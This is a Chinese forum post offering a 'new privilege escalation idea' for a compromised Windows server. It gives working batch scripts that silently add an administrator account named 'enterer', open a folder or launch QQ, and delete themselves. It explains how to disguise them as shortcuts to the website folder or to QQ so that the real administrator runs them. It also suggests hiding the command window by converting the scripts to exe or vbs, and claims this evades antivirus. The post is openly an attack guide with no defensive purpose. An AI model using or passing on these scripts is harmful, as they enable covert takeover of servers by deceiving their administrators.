设为首页 | 收藏本页
登陆您的帐号 | 免费注册帐号
全部栏目 > 计算机 > 软件 > 自由
下一篇上一篇 首页图文展示(无图)

新的提权思路

发布人:hy58
发布日期:2015-06-05 15:49:13
刷新日期:2015-06-05 15:49:13
回复或评论:0
阅览:461
因为最近在自己的博客里更新关于服务器提权的文章,所以在看了文章以后便有了个念头,何不用这种方式来实现服务器的提权。    
    新建一个temp.bat,内容    
    @echo off    
    net user enterer 123456 /add & net localgroup administrators enterer /add    
    start c:wwwroot    
    attrib "c:wwwroot" -h -s    
    del c:phptemp.bat    
    del c: wwwroot.lnk    
    exit    
    意思是在运行一个快捷方式的时候添加账号并且打开网站的文件夹,最后把文件夹的隐藏属性去掉并且删除自己。   
    这个是默认运行在C:php里的temp.bat 打开的网站文件夹是c:wwwroot可以根据现实进行修改。    
    点击temp.bat的右键选择建立快捷方式,把快捷方式放在网站一样的文件夹或者前一个文件夹。当你主动提权失败的时候就可以用这个方法了,可以挂黑页或者发email给管理员。管理员登陆服务器的时候,访问我们的快捷方式(他以为是网站的目录),此时就可以提权成功了。    
    这里给的是一种思路,不要问怎么把网站文件夹隐藏,怎么去掉快捷方式的箭头等等。因为用快捷方式会闪现一个CMD窗口,可以考虑把快捷方式改成exe文件(就不会有箭头,但是有后缀),把运行的bat改成exe或者vbs等,使CMD窗口不显现(具体可以用bat2exe等工具)。    
    或者你有权限修改桌面快捷方式,那就不担心箭头问题了。把管理员可能经常用的程序,如QQ等快捷方式修改成指向可以运行提权命令并可以运行QQ的bat文件。例如    
    @echo off    
    net user enterer 123456 /add & net localgroup administrators enterer /add    
    start c:qqqq.exe    
    exit    
    这个也算变相的捆绑了,不过绝对是免杀的。命令可以是加账号或者开3389,运行telnet服务等。怎么诱导管理员点击就是大家的问题了。    
    文章都是字可能大家不太习惯,希望大家有耐心看完,虽然这样提权的机会比较小,但是作为一种思路吧,呵呵。
评论(0) 暂无回帖


打印 收藏 关闭窗口 下一篇上一篇